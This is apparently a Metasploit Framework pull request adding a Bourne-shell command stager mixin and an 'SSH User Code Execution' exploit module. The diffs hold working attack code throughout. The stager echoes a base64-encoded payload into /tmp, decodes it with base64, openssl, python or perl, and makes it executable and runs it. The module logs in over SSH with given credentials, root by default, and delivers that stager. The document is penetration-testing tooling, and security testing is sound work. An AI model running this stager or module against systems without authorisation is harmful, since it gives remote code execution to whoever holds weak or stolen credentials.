### PR TITLE
Exploit mixin cmdstagerbourne

### DIFF
--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -21,7 +21,7 @@ module Exploit::CmdStagerBourne
 
 		register_advanced_options(
 			[
-				OptString.new( 'DECODER',  [ true, 'The decoding binary to use. (base64, openssl, python, perl)', 'base64']),
+				OptEnum.new( 'DECODER',  [ true, 'The decoding binary to use', 'base64', ['base64', 'openssl', 'python', 'perl']]),
 			], self.class)
 	end
 

--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -1,0 +1,43 @@
+# -*- coding: binary -*-
+##
+# $Id: cmdstager_bourne.rb
+##
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerBourne
+
+	include Msf::Exploit::CmdStager
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'DECODER',  [ true, 'The decoding binary to use.', 'base64']),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerBourne.new(exe)
+	end
+
+	def generate_cmdstager(opts = {}, pl = nil)
+		opts.merge!({ :decoder => datastore['DECODER'] })
+		available_decoders = ['base64', 'openssl', 'python', 'perl']
+		if not available_decoders.include?(opts[:decoder])
+			print_error("Decoder must be one of #{available_decoders.join(', ')}")
+			raise ArgumentError
+		end
+		super
+	end
+end
+
+end

--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -21,7 +21,7 @@ module Exploit::CmdStagerBourne
 
 		register_advanced_options(
 			[
-				OptString.new( 'DECODER',  [ true, 'The decoding binary to use.', 'base64']),
+				OptString.new( 'DECODER',  [ true, 'The decoding binary to use. (base64, openssl, python, perl)', 'base64']),
 			], self.class)
 	end
 

--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -1,7 +1,4 @@
 # -*- coding: binary -*-
-##
-# $Id: cmdstager_bourne.rb
-##
 
 require 'msf/core/exploit/cmdstager'
 
@@ -16,48 +13,8 @@ module Exploit::CmdStagerBourne
 
 	include Msf::Exploit::CmdStager
 
-	def initialize(info = {})
-		super
-
-		register_advanced_options(
-			[
-				OptEnum.new( 'DECODER',  [ false, 'The decoding binary to use', 'auto', ['auto', 'base64', 'openssl', 'python', 'perl']]),
-			], self.class)
-	end
-
 	def create_stager(exe)
 		Rex::Exploitation::CmdStagerBourne.new(exe)
-	end
-
-	def generate_cmdstager(opts = {}, pl = nil)
-		available_decoders = ['base64', 'openssl', 'python', 'perl']
-		opts.merge!({ :decoder => datastore['DECODER'] })
-
-		if opts[:decoder] == 'auto'
-			if self.respond_to? :execute_command_with_feedback
-				available_decoders.each do |bin|
-					which_result = execute_command_with_feedback("which #{bin}", opts).to_s
-					which_result = which_result.strip
-					if which_result.split.length == 1 and which_result.end_with?(bin)
-						opts[:decoder] = bin
-						break
-					end
-				end
-			end
-
-			if opts[:decoder] == 'auto'
-				print_error("Could not detect an appropriate decoder, try setting the DECODER option")
-				raise ArgumentError
-			else
-				print_status("Command Stager using auto-detected decoder: #{opts[:decoder]}")
-			end
-		end
-
-		if not available_decoders.include?(opts[:decoder])
-			print_error("Decoder must be one of #{available_decoders.join(', ')}")
-			raise ArgumentError
-		end
-		super
 	end
 end
 

--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -21,7 +21,7 @@ module Exploit::CmdStagerBourne
 
 		register_advanced_options(
 			[
-				OptEnum.new( 'DECODER',  [ true, 'The decoding binary to use', 'base64', ['base64', 'openssl', 'python', 'perl']]),
+				OptEnum.new( 'DECODER',  [ false, 'The decoding binary to use', 'auto', ['auto', 'base64', 'openssl', 'python', 'perl']]),
 			], self.class)
 	end
 
@@ -30,8 +30,29 @@ module Exploit::CmdStagerBourne
 	end
 
 	def generate_cmdstager(opts = {}, pl = nil)
-		opts.merge!({ :decoder => datastore['DECODER'] })
 		available_decoders = ['base64', 'openssl', 'python', 'perl']
+		opts.merge!({ :decoder => datastore['DECODER'] })
+
+		if opts[:decoder] == 'auto'
+			if self.respond_to? :execute_command_with_feedback
+				available_decoders.each do |bin|
+					which_result = execute_command_with_feedback("which #{bin}", opts).to_s
+					which_result = which_result.strip
+					if which_result.split.length == 1 and which_result.end_with?(bin)
+						opts[:decoder] = bin
+						break
+					end
+				end
+			end
+
+			if opts[:decoder] == 'auto'
+				print_error("Could not detect an appropriate decoder, try setting the DECODER option")
+				raise ArgumentError
+			else
+				print_status("Command Stager using auto-detected decoder: #{opts[:decoder]}")
+			end
+		end
+
 		if not available_decoders.include?(opts[:decoder])
 			print_error("Decoder must be one of #{available_decoders.join(', ')}")
 			raise ArgumentError

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
-# $Id$
+# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $
 #
 # All exploit mixins should be added to the list below
 #
@@ -24,6 +24,7 @@ require 'msf/core/exploit/cmdstager_vbs_adodb'
 require 'msf/core/exploit/cmdstager_debug_write'
 require 'msf/core/exploit/cmdstager_debug_asm'
 require 'msf/core/exploit/cmdstager_tftp'
+require 'msf/core/exploit/cmdstager_bourne'
 
 # Protocol
 require 'msf/core/exploit/tcp'

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
-# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $
+# $Id$
 #
 # All exploit mixins should be added to the list below
 #

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
-# $Id$
+# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $
 #
 # All exploit mixins should be added to the list below
 #

--- a/lib/rex/exploitation/cmdstager.rb
+++ b/lib/rex/exploitation/cmdstager.rb
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 ##
-# $Id$
+# $Id: cmdstager.rb 15548 2012-06-29 06:08:20Z rapid7 $
 ##
 
 require 'rex/exploitation/cmdstager/base'
@@ -8,3 +8,4 @@ require 'rex/exploitation/cmdstager/vbs'
 require 'rex/exploitation/cmdstager/debug_write'
 require 'rex/exploitation/cmdstager/debug_asm'
 require 'rex/exploitation/cmdstager/tftp'
+require 'rex/exploitation/cmdstager/bourne'

--- a/lib/rex/exploitation/cmdstager.rb
+++ b/lib/rex/exploitation/cmdstager.rb
@@ -1,7 +1,5 @@
 # -*- coding: binary -*-
-##
-# $Id: cmdstager.rb 15548 2012-06-29 06:08:20Z rapid7 $
-##
+# $Id$
 
 require 'rex/exploitation/cmdstager/base'
 require 'rex/exploitation/cmdstager/vbs'

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -21,8 +21,6 @@ class CmdStagerBourne < CmdStagerBase
 
 	def generate(opts = {})
 		opts[:temp] = opts[:temp] || '/tmp/'
-		opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
-		opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
 		super
 	end
 

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -65,7 +65,6 @@ class CmdStagerBourne < CmdStagerBase
 		cmds
 	end
 
-
 	#
 	# Generate the commands that will decode the file we just created
 	#

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -21,6 +21,8 @@ class CmdStagerBourne < CmdStagerBase
 
 	def generate(opts = {})
 		opts[:temp] = opts[:temp] || '/tmp/'
+		opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+		opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
 		super
 	end
 

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -67,10 +67,10 @@ class CmdStagerBourne < CmdStagerBase
 	#
 	def generate_cmds_decoder(opts)
 		decoders = [
-			"base64 --decode #{@tempdir}#{@var_encoded}.b64",
-			"openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64",
-			"python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64",
-			"perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
+			"base64 --decode -",
+			"openssl enc -d -A -base64 -in /dev/stdin",
+			"python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
+			"perl -MMIME::Base64 -ne 'print decode_base64($_)'"
 		]
 		decoder_cmd = []
 		decoders.each do |cmd|
@@ -78,7 +78,7 @@ class CmdStagerBourne < CmdStagerBase
 			decoder_cmd << "(which #{binary} >&2 && #{cmd})"
 		end
 		decoder_cmd = decoder_cmd.join(" || ")
-		decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin"
+		decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin < #{@tempdir}#{@var_encoded}.b64"
 		[ decoder_cmd ]
 	end
 

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -1,0 +1,106 @@
+# -*- coding: binary -*-
+##
+# $Id: bourne.rb 12595 2011-05-12 18:33:49Z zeroSteiner $
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+		@decoder     = nil # filled in later
+	end
+
+	def generate(opts = {})
+		opts.merge!({:temp => '/tmp/'})
+		super
+	end
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+		case opts[:decoder]
+		when 'base64'
+			decoder = "base64 -d #{@tempdir}#{@var_encoded}.b64"
+		when 'openssl'
+			decoder = "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64"
+		when 'python'
+			decoder = "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64"
+		when 'perl'
+			decoder = "perl -MIO -e 'use MIME::Base64; print decode_base64(<>);' < #{@tempdir}#{@var_encoded}.b64"
+		end
+		decoder << " > #{@tempdir}#{@var_decoded}.bin"
+		[ decoder ]
+	end
+
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "chmod +x #{@tempdir}#{@var_decoded}.bin"
+		cmds << "#{@tempdir}#{@var_decoded}.bin"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "rm -f #{@tempdir}#{@var_decoded}.bin"
+			cmds << "rm -f #{@tempdir}#{@var_encoded}.b64"
+		end
+
+		super
+	end
+
+	def cmd_concat_operator
+		" ; "
+	end
+
+end
+end
+end

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -79,10 +79,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		)
 	end
 
-	def execute_command(cmd, opts)
+	def execute_command(cmd, opts = {})
 		begin
 			Timeout.timeout(3) do
-				self.ssh_socket.exec!(cmd)
+				self.ssh_socket.exec!("#{cmd}\n")
+			end
+		rescue ::Exception
+		end
+	end
+
+	def execute_command_with_feedback(cmd, opts = {})
+		begin
+			Timeout.timeout(3) do
+				feedback = self.ssh_socket.exec!("#{cmd}\n")
+				return feedback
 			end
 		rescue ::Exception
 		end

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -1,0 +1,127 @@
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ManualRanking
+
+	include Msf::Exploit::CmdStagerBourne
+
+	attr_accessor :ssh_socket
+
+	def initialize
+		super(
+			'Name'        => 'SSH User Code Execution',
+			'Version'     => '',
+			'Description' => %q{
+				This module utilizes a stager to upload a base64 encoded
+				binary which is then decoded, chmod'ed and executed from
+				the command shell.
+			},
+			'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
+			'References'  =>
+				[
+					[ 'CVE', '1999-0502'] # Weak password
+				],
+			'License'     => MSF_LICENSE,
+			'Privileged'  => true,
+			'DefaultOptions' =>
+				{
+					'PrependFork' => 'true',
+					'EXITFUNC' => 'process'
+				},
+			'Payload'     =>
+				{
+					'Space'    => 4096,
+					'BadChars' => "",
+					'DisableNops' => true
+				},
+			'Platform'    => [ 'osx', 'linux' ],
+			'Targets'     =>
+				[
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						},
+					],
+					[ 'Linux x64',
+						{
+							'Arch' => ARCH_X86_64,
+							'Platform' => 'linux'
+						},
+					],
+					[ 'OSX x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'osx'
+						},
+					],
+				],
+			'DefaultTarget'  => 0,
+			# For the CVE
+			'DisclosureDate' => 'Jan 01 1999'
+		)
+
+		register_options(
+			[
+				OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
+				OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
+				OptString.new('RHOST', [ true, "The target address" ]),
+				Opt::RPORT(22)
+			], self.class
+		)
+
+		register_advanced_options(
+			[
+				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
+			]
+		)
+	end
+
+	def execute_command(cmd, opts)
+		begin
+			Timeout.timeout(3) do
+				self.ssh_socket.exec!(cmd)
+			end
+		rescue ::Exception
+		end
+	end
+
+	def do_login(ip, user, pass, port)
+		opt_hash = {
+			:auth_methods  => ['password', 'keyboard-interactive'],
+			:msframework   => framework,
+			:msfmodule     => self,
+			:port          => port,
+			:disable_agent => true,
+			:password      => pass
+		}
+
+		opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+		begin
+			self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
+		rescue Rex::ConnectionError, Rex::AddressInUse
+			fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
+		rescue Net::SSH::Disconnect, ::EOFError
+			fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
+		rescue Net::SSH::AuthenticationFailed
+			fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
+		rescue Net::SSH::Exception => e
+			fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+		end
+
+		if not self.ssh_socket
+			fail_with(Exploit::Failure::Unknown)
+		end
+		return
+	end
+
+	def exploit
+		do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
+
+		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
+		execute_cmdstager({:linemax => 500})
+	end
+end

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -1,3 +1,9 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
 
 require 'msf/core'
 require 'net/ssh'
@@ -12,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize
 		super(
 			'Name'        => 'SSH User Code Execution',
-			'Version'     => '',
 			'Description' => %q{
 				This module utilizes a stager to upload a base64 encoded
 				binary which is then decoded, chmod'ed and executed from
@@ -83,16 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			Timeout.timeout(3) do
 				self.ssh_socket.exec!("#{cmd}\n")
-			end
-		rescue ::Exception
-		end
-	end
-
-	def execute_command_with_feedback(cmd, opts = {})
-		begin
-			Timeout.timeout(3) do
-				feedback = self.ssh_socket.exec!("#{cmd}\n")
-				return feedback
 			end
 		rescue ::Exception
 		end


### PR DESCRIPTION
This pull request adds the new Exploit Mixin CmdStagerBourne and an example sshexec module to demonstrate its features.  It works in a very similar fashion to the Windows CmdStagerVBS Mixin in that it Base64 encodes the payload, uploads it by echoing it to a file, decodes it and ultimately executes it.

It is dubbed the Bourne stager but the with the sshexec module, it has also been used with bash and zshell.

The sshexec module has been tested on Fedora 64-bit, Ubuntu 32-bit, and OSX 10.7 and the four available DECODER values are functioning on all tested systems.
